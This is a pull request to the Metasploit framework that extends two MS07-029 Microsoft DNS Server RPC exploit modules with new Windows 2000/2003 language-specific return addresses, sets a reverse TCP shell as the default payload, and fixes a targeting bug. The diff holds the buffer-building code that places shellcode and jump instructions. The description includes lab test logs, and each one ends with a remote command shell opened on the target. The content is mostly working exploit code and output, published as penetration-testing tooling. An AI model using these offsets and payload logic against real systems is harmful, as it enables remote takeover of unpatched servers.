### PR TITLE
ms07_029_msdns_zonename: Add additional Windows 2000/2003 target offsets

### DIFF
--- a/modules/exploits/windows/dcerpc/ms07_029_msdns_zonename.rb
+++ b/modules/exploits/windows/dcerpc/ms07_029_msdns_zonename.rb
@@ -20,8 +20,9 @@ class MetasploitModule < Msf::Exploit::Remote
       },
       'Author'         =>
         [
-          'hdm',    # initial module
-          'Unknown' # 2 unknown contributors (2003 support)
+          'hdm',     # initial module
+          'Unknown', # 2 unknown contributors (2003 support)
+          'bcoles'   # additional target offsets
         ],
       'License'        => MSF_LICENSE,
       'References'     =>
@@ -33,7 +34,8 @@ class MetasploitModule < Msf::Exploit::Remote
       'Privileged'     => true,
       'DefaultOptions' =>
         {
-          'EXITFUNC' => 'thread'
+          'EXITFUNC' => 'thread',
+          'PAYLOAD' => 'windows/shell/reverse_tcp'
         },
       'Payload'        =>
         {
@@ -48,12 +50,22 @@ class MetasploitModule < Msf::Exploit::Remote
       'Platform'       => 'win',
       'Targets'        =>
         [
-          [ 'Automatic (2000 SP0-SP4, 2003 SP0, 2003 SP1-SP2)', { } ],
+          [ 'Automatic (2000 SP0-SP4, 2003 SP0-SP2)', { } ],
 
-          # WS2HELP.DLL
+          # p/p/r WS2HELP.DLL
           [ 'Windows 2000 Server SP0-SP4+ English', { 'OS' => '2000', 'Off' => 1213, 'Ret' => 0x75022ac4 } ],
-          [ 'Windows 2000 Server SP0-SP4+ Italian', { 'OS' => '2000', 'Off' => 1213, 'Ret' => 0x74fd2ac4 } ],
           [ 'Windows 2000 Server SP0-SP4+ French', { 'OS' => '2000', 'Off' => 1213, 'Ret' => 0x74fa2ac4 } ],
+          [ 'Windows 2000 Server SP0-SP4+ German', { 'OS' => '2000', 'Off' => 1213, 'Ret' => 0x74f92ac4 } ],
+          [ 'Windows 2000 Server SP0-SP4+ Italian', { 'OS' => '2000', 'Off' => 1213, 'Ret' => 0x74fd2ac4 } ],
+          [ 'Windows 2000 Server SP0-SP4+ Polish', { 'OS' => '2000', 'Off' => 1213, 'Ret' => 0x74fb2ac4 } ],
+          [ 'Windows 2000 Server SP0-SP4+ Portuguese', { 'OS' => '2000', 'Off' => 1213, 'Ret' => 0x74fd2ac4 } ],
+          [ 'Windows 2000 Server SP0-SP4+ Korean', { 'OS' => '2000', 'Off' => 1213, 'Ret' => 0x74f92ac4 } ],
+          [ 'Windows 2000 Server SP0-SP4+ Russian', { 'OS' => '2000', 'Off' => 1213, 'Ret' => 0x74fb2ac4 } ],
+          [ 'Windows 2000 Server SP0-SP4+ Simplified Chinese', { 'OS' => '2000', 'Off' => 1213, 'Ret' => 0x74fa2ac4 } ],
+          [ 'Windows 2000 Server SP0-SP4+ Spanish', { 'OS' => '2000', 'Off' => 1213, 'Ret' => 0x74fd2ac4 } ],
+          [ 'Windows 2000 Server SP0-SP4+ Swedish', { 'OS' => '2000', 'Off' => 1213, 'Ret' => 0x74fa2ac4 } ],
+          [ 'Windows 2000 Server SP0-SP4+ Traditional Chinese', { 'OS' => '2000', 'Off' => 1213, 'Ret' => 0x74fa2ac4 } ],
+          [ 'Windows 2000 Server SP0-SP4+ Turkish', { 'OS' => '2000', 'Off' => 1213, 'Ret' => 0x74fc2ac4 } ],
 
           # Use the __except_handler3 method (and jmp esp in ATL.dll)
           [ 'Windows 2003 Server SP0 English', { 'OS' => '2003SP0', 'Off' => 1593, 'Rets' => [0x77f45a34, 0x77f7e7f0, 0x76a935bf] } ],
@@ -65,7 +77,8 @@ class MetasploitModule < Msf::Exploit::Remote
           [ 'Windows 2003 Server SP1-SP2 Spanish', { 'OS' => '2003SP12', 'Off' => 1633, 'IB' => 0x76a30000 } ],
           [ 'Windows 2003 Server SP1-SP2 Italian', { 'OS' => '2003SP12', 'Off' => 1633, 'IB' => 0x76970000 } ],
           [ 'Windows 2003 Server SP1-SP2 German', { 'OS' => '2003SP12', 'Off' => 1633, 'IB' => 0x76970000 } ],
-
+          [ 'Windows 2003 Server SP1-SP2 Russian', { 'OS' => '2003SP12', 'Off' => 1633, 'IB' => 0x769a0000 } ],
+          [ 'Windows 2003 Server SP1-SP2 Simplified Chinese', { 'OS' => '2003SP12', 'Off' => 1633, 'IB' => 0x769c0000 } ],
         ],
       'DisclosureDate' => '2007-04-12',
       'DefaultTarget'  => 0 ))
@@ -138,8 +151,7 @@ class MetasploitModule < Msf::Exploit::Remote
       end
 
       if (not mytarget)
-        print_error("There is no available target for this locale")
-        return
+        fail_with(Failure::NoTarget, "There is no available target for '#{datastore['LOCALE']}' locale")
       end
     else
       mytarget = target
@@ -149,7 +161,7 @@ class MetasploitModule < Msf::Exploit::Remote
 
     # Connect to the high RPC port
     connect(true, { 'RPORT' => dport })
-    print_status("Trying target #{target.name}...")
+    print_status("Trying target #{mytarget.name}...")
 
     # Bind to the service
     handle = dcerpc_handle('50abc2a4-574d-40b3-9d66-ee4fd5fba076', '5.0', 'ncacn_ip_tcp', [datastore['RPORT']])
@@ -160,18 +172,18 @@ class MetasploitModule < Msf::Exploit::Remote
     # Create our buffer with our shellcode first
     txt = Rex::Text.rand_text_alphanumeric(8192)
 
-    if (target['OS'] =~ /2000/)
+    if (mytarget['OS'] =~ /2000/)
       txt[0, payload.encoded.length] = payload.encoded
 
-      off = target['Off']
+      off = mytarget['Off']
       txt[ off ] = [mytarget.ret].pack('V')
       txt[ off - 4, 2] = "\xeb\x06"
       txt[ off + 4, 5] = "\xe9" + [ (off+9) * -1 ].pack('V')
 
-    elsif (target['OS'] =~ /2003SP0/)
+    elsif (mytarget['OS'] =~ /2003SP0/)
       txt[0, payload.encoded.length] = payload.encoded
 
-      off = target['Off']
+      off = mytarget['Off']
       txt[ off ] = [mytarget['Rets'][0]].pack('V')  # __except_handler3
       txt[ off - 4, 2] = "\xeb\x16"
 

--- a/modules/exploits/windows/smb/ms07_029_msdns_zonename.rb
+++ b/modules/exploits/windows/smb/ms07_029_msdns_zonename.rb
@@ -24,8 +24,9 @@ class MetasploitModule < Msf::Exploit::Remote
       },
       'Author'         =>
         [
-          'hdm',    # initial module
-          'Unknown' # 2 unknown contributors (2003 support)
+          'hdm',     # initial module
+          'Unknown', # 2 unknown contributors (2003 support)
+          'bcoles'   # additional target offsets
         ],
       'License'        => MSF_LICENSE,
       'References'     =>
@@ -37,7 +38,8 @@ class MetasploitModule < Msf::Exploit::Remote
       'Privileged'     => true,
       'DefaultOptions' =>
         {
-          'EXITFUNC' => 'thread'
+          'EXITFUNC' => 'thread',
+          'PAYLOAD' => 'windows/shell/reverse_tcp'
         },
       'Payload'        =>
         {
@@ -52,17 +54,26 @@ class MetasploitModule < Msf::Exploit::Remote
       'Platform'       => 'win',
       'Targets'        =>
         [
-          [ 'Automatic (2000 SP0-SP4, 2003 SP0, 2003 SP1-SP2)', { } ],
+          [ 'Automatic (2000 SP0-SP4, 2003 SP0-SP2)', { } ],
 
-          # WS2HELP.DLL
+          # p/p/r WS2HELP.DLL
           [ 'Windows 2000 Server SP0-SP4+ English', { 'OS' => '2000', 'Off' => 1213, 'Ret' => 0x75022ac4 } ],
-          [ 'Windows 2000 Server SP0-SP4+ Italian', { 'OS' => '2000', 'Off' => 1213, 'Ret' => 0x74fd2ac4 } ],
           [ 'Windows 2000 Server SP0-SP4+ French', { 'OS' => '2000', 'Off' => 1213, 'Ret' => 0x74fa2ac4 } ],
+          [ 'Windows 2000 Server SP0-SP4+ German', { 'OS' => '2000', 'Off' => 1213, 'Ret' => 0x74f92ac4 } ],
+          [ 'Windows 2000 Server SP0-SP4+ Italian', { 'OS' => '2000', 'Off' => 1213, 'Ret' => 0x74fd2ac4 } ],
+          [ 'Windows 2000 Server SP0-SP4+ Polish', { 'OS' => '2000', 'Off' => 1213, 'Ret' => 0x74fb2ac4 } ],
+          [ 'Windows 2000 Server SP0-SP4+ Portuguese', { 'OS' => '2000', 'Off' => 1213, 'Ret' => 0x74fd2ac4 } ],
+          [ 'Windows 2000 Server SP0-SP4+ Korean', { 'OS' => '2000', 'Off' => 1213, 'Ret' => 0x74f92ac4 } ],
+          [ 'Windows 2000 Server SP0-SP4+ Russian', { 'OS' => '2000', 'Off' => 1213, 'Ret' => 0x74fb2ac4 } ],
+          [ 'Windows 2000 Server SP0-SP4+ Simplified Chinese', { 'OS' => '2000', 'Off' => 1213, 'Ret' => 0x74fa2ac4 } ],
+          [ 'Windows 2000 Server SP0-SP4+ Spanish', { 'OS' => '2000', 'Off' => 1213, 'Ret' => 0x74fd2ac4 } ],
+          [ 'Windows 2000 Server SP0-SP4+ Swedish', { 'OS' => '2000', 'Off' => 1213, 'Ret' => 0x74fa2ac4 } ],
+          [ 'Windows 2000 Server SP0-SP4+ Traditional Chinese', { 'OS' => '2000', 'Off' => 1213, 'Ret' => 0x74fa2ac4 } ],
+          [ 'Windows 2000 Server SP0-SP4+ Turkish', { 'OS' => '2000', 'Off' => 1213, 'Ret' => 0x74fc2ac4 } ],
 
           # Use the __except_handler3 method (and jmp esp in ATL.dll)
           [ 'Windows 2003 Server SP0 English', { 'OS' => '2003SP0', 'Off' => 1593, 'Rets' => [0x77f45a34, 0x77f7e7f0, 0x76a935bf] } ],
           [ 'Windows 2003 Server SP0 French', { 'OS' => '2003SP0', 'Off' => 1593, 'Rets' => [0x77f35a34, 0x77f6e7f0, 0x76a435bf] } ],
-
 
           # ATL.DLL (bypass DEP/NX, IB -> Image Base of ATL.dll)
           [ 'Windows 2003 Server SP1-SP2 English', { 'OS' => '2003SP12', 'Off' => 1633, 'IB' => 0x76a80000 } ],
@@ -70,7 +81,8 @@ class MetasploitModule < Msf::Exploit::Remote
           [ 'Windows 2003 Server SP1-SP2 Spanish', { 'OS' => '2003SP12', 'Off' => 1633, 'IB' => 0x76a30000 } ],
           [ 'Windows 2003 Server SP1-SP2 Italian', { 'OS' => '2003SP12', 'Off' => 1633, 'IB' => 0x76970000 } ],
           [ 'Windows 2003 Server SP1-SP2 German', { 'OS' => '2003SP12', 'Off' => 1633, 'IB' => 0x76970000 } ],
-
+          [ 'Windows 2003 Server SP1-SP2 Russian', { 'OS' => '2003SP12', 'Off' => 1633, 'IB' => 0x769a0000 } ],
+          [ 'Windows 2003 Server SP1-SP2 Simplified Chinese', { 'OS' => '2003SP12', 'Off' => 1633, 'IB' => 0x769c0000 } ],
         ],
       'DisclosureDate' => '2007-04-12',
       'DefaultTarget'  => 0 ))
@@ -124,14 +136,12 @@ class MetasploitModule < Msf::Exploit::Remote
         print_status("Detected a Windows 2003 SP#{$2} target...")
         target = gettarget('2003SP12')
       else
-        print_status("Unknown OS: #{smb_peer_os}")
-        return
+        fail_with(Failure::NoTarget, "No target for OS: #{smb_peer_os}")
       end
     end
 
     if (not target)
-      print_status("There is no available target for this OS locale")
-      return
+      fail_with(Failure::NoTarget, "There is no available target for '#{datastore['LOCALE']}' locale")
     end
 
     print_status("Trying target #{target.name}...")


### PR DESCRIPTION
* Adds 12 new targets to both DCERPC and SMB modules for MS07-029. Targets are identical for both modules.
  * All new targets tested with DCERPC module
  * Two new targets tested with SMB module
* Fixes a bug in the automatic targeting for the DCERPC module, which was broken due to using `target` instead of `mytarget`.
* Sets the default payload to `windows/shell/reverse_tcp` for compatibility with these systems.

DCERPC module tested on:

* Windows 2000 Server SP4 German
* Windows 2000 Server SP4 Polish
* Windows 2000 Server SP4 Portuguese
* Windows 2000 Server SP4 Korean
* Windows 2000 Server SP4 Russian
* Windows 2000 Server SP4 Simplified Chinese
* Windows 2000 Server SP4 Spanish
* Windows 2000 Server SP1 Swedish
* Windows 2000 Server SP4 Traditional Chinese
* Windows 2000 Server SP4 Turkish
* Windows 2003 Server SP2 Russian
* Windows 2003 Server SP2 Simplified Chinese

SMB module tested on:

* Windows 2000 Server SP4 German
* Windows 2003 Server SP2 Russian

Example output below (Russian Cyrillic characters in command prompt do not render correctly).

# windows/dcerpc/ms07_029_msdns_zonename

Windows 2000 Server SP4 Russian:

```
msf6 exploit(windows/dcerpc/ms07_029_msdns_zonename) > run

[*] Started reverse TCP handler on 172.16.191.192:4444 
[*] 172.16.191.171:0 - Connecting to the endpoint mapper service...
[*] 172.16.191.171:0 - Discovered Microsoft DNS Server RPC service on port 1039
[*] 172.16.191.171:0 - Connecting to the endpoint mapper service...
[*] 172.16.191.171:0 - Connecting to the endpoint mapper service...
[*] 172.16.191.171:0 - Detected a Windows 2000 SP0-SP4 target...
[*] 172.16.191.171:0 - Trying target Windows 2000 Server SP0-SP4+ Russian...
[*] 172.16.191.171:0 - Binding to 50abc2a4-574d-40b3-9d66-ee4fd5fba076:5.0@ncacn_ip_tcp:172.16.191.171[0] ...
[*] 172.16.191.171:0 - Bound to 50abc2a4-574d-40b3-9d66-ee4fd5fba076:5.0@ncacn_ip_tcp:172.16.191.171[0] ...
[*] 172.16.191.171:0 - Sending exploit...
[*] Encoded stage with x86/shikata_ga_nai
[*] Sending encoded stage (267 bytes) to 172.16.191.171
[*] Command shell session 1 opened (172.16.191.192:4444 -> 172.16.191.171:1041 ) at 2021-11-28 21:38:46 -0500
[-] 172.16.191.171:0 - Error: no response from dcerpc service


Shell Banner:
Microsoft Windows 2000 [_ 5.00.2195]
(_) _ _, 1985-2000.

C:\WINNT\system32>
-----
```

# windows/smb/ms07_029_msdns_zonename

Windows 2003 Server SP2 Russian:

```
msf6 exploit(windows/smb/ms07_029_msdns_zonename) > rexploit 
[*] Reloading module...

[*] Started reverse TCP handler on 172.16.191.192:4444 
[*] 172.16.191.247:445 - Detected a Windows 2003 SP2 target...
[*] 172.16.191.247:445 - Trying target Windows 2003 Server SP1-SP2 Russian...
[*] 172.16.191.247:445 - Binding to 50abc2a4-574d-40b3-9d66-ee4fd5fba076:5.0@ncacn_np:172.16.191.247[\dnsserver] ...
[*] 172.16.191.247:445 - Bound to 50abc2a4-574d-40b3-9d66-ee4fd5fba076:5.0@ncacn_np:172.16.191.247[\dnsserver] ...
[*] 172.16.191.247:445 - Sending exploit...
[*] Encoded stage with x86/shikata_ga_nai
[*] Sending encoded stage (267 bytes) to 172.16.191.247
[-] 172.16.191.247:445 - Error: Stream #<Socket:0x000055649534d4e8> is closed.
[*] Command shell session 33 opened (172.16.191.192:4444 -> 172.16.191.247:1124 ) at 2021-11-30 02:29:19 -0500


Shell Banner:
Microsoft Windows [?????? 5.2.3790]
-----
          

C:\WINDOWS\system32>
```
